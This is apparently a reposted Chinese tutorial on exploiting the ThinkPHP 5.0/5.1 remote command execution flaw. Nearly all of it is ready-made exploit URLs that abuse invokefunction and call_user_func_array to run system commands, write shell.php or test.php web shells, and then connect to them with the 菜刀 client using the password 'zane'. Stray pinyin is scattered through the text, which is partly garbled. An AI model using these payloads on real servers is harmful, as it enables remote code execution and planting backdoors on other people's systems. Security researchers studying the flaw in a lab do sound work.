下面由thinkphp框架教程欄目給大家介紹ThinkPHP 漏洞利用,希望對(duì)需要的朋友有所幫助!
thinkphp_5x_命令執(zhí)行漏洞
受影響版本包括5.0和5.1版本
docker漏洞環(huán)境源碼:https://github.com/vulnspy/thinkphp-5.1.29
本地環(huán)境搭建:
thinkphp5.0.15+php5.6n+ apache2.0http://www.thinkphp.cn/donate/download/id/1125.html
EXPhttp://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
EXP:http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK
使用菜刀連接
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密碼為zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密碼為zane
`
分享題目:關(guān)于ThinkPHP漏洞利用
分享路徑:http://weahome.cn/article/chdjid.html